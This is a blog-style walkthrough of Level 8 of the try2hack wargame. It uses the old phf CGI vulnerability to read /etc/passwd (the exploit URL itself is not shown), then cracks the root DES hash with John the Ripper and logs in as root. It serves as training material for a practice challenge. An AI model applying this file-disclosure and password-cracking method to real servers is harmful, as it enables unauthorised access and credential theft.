What is it? @.@

Here is the place where I record some tactics about wargame, systems, and other security issues.


TRY2HACK - Level 8



Enter your login information to access your account:
  ̄ ̄ ̄
  1. View page source code ad we will find out ...

    <form method="post" action="/cgi-bin/phf">
      Enter your login information to access your account:<br /><br />
      Username: <input type="text" name="username" size="20" /><br />
      Password: <input type="password" name="password" size="20" /><br /><br />
      <input type="submit" value="Enter" name="submit" />

  2. The most well-known CGI vulnerability :
    Wikipedia: http://pt.wikipedia.org/wiki/Phf
    Reference: http://insecure.org/sploits/phf-cgi.html
  3. Okay, use the URL like below to exploit the vulnerability ...
  4. Now we got the file content of '/etc/passwd'.
    root:khXGN7s.ldaJI:0:0::0:0:Charlie &:/root:/usr/local/bin/bash
    daemon:*:1:1::0:0:Owner of many system processes:/root:/sbin/nologin
    operator:*:2:5::0:0:System Operator:/:/sbin/nologin
    bin:*:3:7::0:0:Binaries Commands and Source:/:/sbin/nologin
    tty:*:4:65533::0:0:Tty Sandbox:/:/sbin/nologin
    kmem:*:5:65533::0:0:KMem Sandbox:/:/sbin/nologin
    games:*:7:13::0:0:Games pseudo-user:/usr/games:/sbin/nologin
    news:*:8:8::0:0:News Subsystem:/:/sbin/nologin
    man:*:9:9::0:0:Mister Man Pages:/usr/share/man:/sbin/nologin
    sshd:*:22:22::0:0:Secure Shell Daemon:/var/empty:/sbin/nologin
    smmsp:*:25:25::0:0:Sendmail Submission User:/var/spool/clientmqueue:/sbin/nologin
    mailnull:*:26:26::0:0:Sendmail Default User:/var/spool/mqueue:/sbin/nologin
    bind:*:53:53::0:0:Bind Sandbox:/:/sbin/nologin
    uucp:*:66:66::0:0:UUCP pseudo-user:/var/spool/uucppublic:/usr/libexec/uucp/uucico xten:*:67:67::0:0:X-10 daemon:/usr/local/xten:/sbin/nologin
    pop:*:68:6::0:0:Post Office Owner:/nonexistent:/sbin/nologin
    www:*:80:80::0:0:World Wide Web Owner:/nonexistent:/sbin/nologin
    nobody:*:65534:65534::0:0:Unprivileged user:/nonexistent:/sbin/nologin
  5. Use john the ripper to decrypt the password of root.
    Loaded 1 password hash (Traditional DES [128/128 BS SSE2])
    arse                          (root)
  6. Use the username : root and password: arse to login the form.
    LEVEL 8

    Hello root, welcome to your account.

    Click here for Level 9! -> hxxp://try2hack.nl/levels/level9-gnapei.xhtml
  7. Well done!!

No comments:

Post a Comment